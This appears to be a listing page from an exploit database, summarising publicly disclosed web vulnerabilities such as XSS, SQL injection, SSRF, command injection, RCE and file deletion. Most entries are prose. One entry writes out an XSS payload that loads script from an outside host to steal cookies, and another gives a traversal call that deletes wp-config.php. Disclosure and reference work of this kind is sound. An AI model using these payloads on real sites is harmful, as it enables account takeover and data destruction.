Explore Vulnerabilities

Explore all Exploits:

Movable Type XMLRPC API Remote Command Injection

This module exploits the Movable Type XMLRPC API remote command injection vulnerability. It sends a POST request to the mt-xmlrpc.cgi endpoint with a base64-encoded command. If the response code is 200 and the response body includes the fingerprint, the vulnerability has been exploited.

WebCTRL OEM 6.5 – ‘locale’ Reflected Cross-Site Scripting (XSS)

The login portal for the Automated Logic WebCTRL/WebCTRL OEM web application contains a vulnerability that allows reflected XSS attacks because the operatorlocale GET parameter is not sanitized. The issue is triggered by passing a basic XSS payload to the vulnerable GET parameter, which is reflected in the output without sanitization.

Umbraco v8.14.1 – ‘baseUrl’ SSRF

Umbraco CMS v8.14.1 is vulnerable to Server-Side Request Forgery (SSRF) due to improper input validation of the 'baseUrl' parameter in the 'Umbraco.Web.Editors.HelpController.GetContextHelpForPage()', 'Umbraco.Web.Editors.DashboardController.GetRemoteDashboardContent()', and 'Umbraco.Web.Editors.DashboardController.GetRemoteDashboardCss()' functions. An attacker can exploit this vulnerability by sending a crafted request to the vulnerable functions with a malicious 'baseUrl' parameter. This can allow an attacker to access internal resources, such as the local network, and potentially gain access to sensitive information.

PHPGurukul Hostel Management System 2.1 – Cross-site request forgery (CSRF) to Cross-site Scripting (XSS)

Navigate to http://localhost/hostel/hostel/my-profile.php and enter the XSS payload '><script src=https://anubhav1403.xss.ht></script> in the name field. Click on Update Profile and intercept the request in Burp Suite. Generate a CSRF PoC of Update Profile and send it to the victim. When the victim opens the PoC, his/her name will be updated to our XSS payload and the payload will fire. The attacker is able to steal the victim's cookies successfully!! Account takeover!!!

WordPress Plugin Supsystic Contact Form 1.7.18 – ‘label’ Stored Cross-Site Scripting (XSS)

A stored cross-site scripting (XSS) vulnerability exists in WordPress Plugin Supsystic Contact Form 1.7.18. An attacker can inject a malicious JavaScript payload into the 'label' field, which will be executed when the page is viewed by an authenticated user.

WordPress Plugin Filterable Portfolio Gallery 1.0 – ‘title’ Stored Cross-Site Scripting (XSS)

A stored Cross-Site Scripting (XSS) vulnerability exists in WordPress Plugin Filterable Portfolio Gallery 1.0, which allows an attacker to inject malicious JavaScript code into the 'title' field. An attacker can exploit this vulnerability by entering a malicious JavaScript payload into the 'title' field, saving and previewing it. The payload will be stored in the database and will be executed when the page is viewed.

phpMyAdmin 4.8.1 – Remote Code Execution (RCE)

A vulnerability in phpMyAdmin 4.8.1 allows an attacker to execute arbitrary code on the server by sending a specially crafted request to the import.php page. The vulnerability is due to insufficient validation of user-supplied input when handling SQL queries. An attacker can exploit this vulnerability to execute arbitrary code on the server.

WordPress 4.9.6 – Arbitrary File Deletion (Authenticated) (2)

An authenticated user with author privileges can delete arbitrary files on the server by exploiting a vulnerability in WordPress 4.9.6. The user can navigate to Media > Add New > Select Files > Open/Upload and click Edit > Open Developer Console > Paste this exploit script and execute the function, e.g. unlink_thumb('../../../../wp-config.php').

WordPress Plugin Media-Tags 3.2.0.2 – Stored Cross-Site Scripting (XSS)

A stored XSS vulnerability exists in the WordPress Plugin Media-Tags version 3.2.0.2. An attacker can inject a malicious JavaScript payload into the 'Media Tag Label Fields' user input field, which will be stored in the database. When the same functionality is triggered, the malicious payload will be executed, resulting in a pop-up.

Engineers Online Portal 1.0 – ‘id’ SQL Injection

An SQL injection vulnerability exists in the Engineers Online Portal. An attacker can leverage the vulnerable "id" parameter in the "quiz_question.php" web page to manipulate the SQL query performed. As a result, he can extract sensitive data from the web server and, in some cases, use this vulnerability to get remote code execution on the remote web server.

Recent Exploits: